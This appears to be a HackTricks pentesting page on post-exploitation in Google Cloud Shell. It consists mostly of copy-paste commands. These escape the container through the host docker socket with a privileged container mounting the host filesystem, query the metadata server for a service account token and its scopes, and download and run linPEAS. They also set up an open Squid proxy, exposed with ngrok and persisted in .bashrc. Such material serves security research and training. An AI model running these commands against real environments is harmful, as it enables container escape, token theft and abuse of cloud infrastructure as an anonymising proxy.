# GCP - Cloud Shell Post Exploitation {{#include ../../../banners/hacktricks-training.md}} ## Cloud Shell For more information about Cloud Shell check: {{#ref}} ../gcp-services/gcp-cloud-shell-enum.md {{#endref}} ### Container Escape Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing: ```bash sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest sudo docker -H unix:///google/host/var/run/docker.sock start escaper sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh ``` This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env. Moreover, notice that from the host you can find a service account token: ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" default/ vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ ``` With the following scopes: ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes" https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring.write ``` Enumerate metadata with LinPEAS: ```bash cd /tmp wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh sh linpeas.sh -o cloud ``` After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**... ### Use it as Proxy If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file): ```bash sudo apt install -y squid ``` Just for let you know Squid is a http proxy server. Create a **squid.conf** file with the following settings: ```bash http_port 3128 cache_dir /var/cache/squid 100 16 256 acl all src 0.0.0.0/0 http_access allow all ``` copy the **squid.conf** file to **/etc/squid** ```bash sudo cp squid.conf /etc/squid ``` Finally run the squid service: ```bash sudo service squid start ``` Use ngrok to let the proxy be available from outside: ```bash ./ngrok tcp 3128 ``` After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server). For better use at startup the .bashrc file should have the following lines: ```bash sudo apt install -y squid sudo cp squid.conf /etc/squid/ sudo service squid start cd ngrok;./ngrok tcp 3128 ``` The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell. {{#include ../../../banners/hacktricks-training.md}}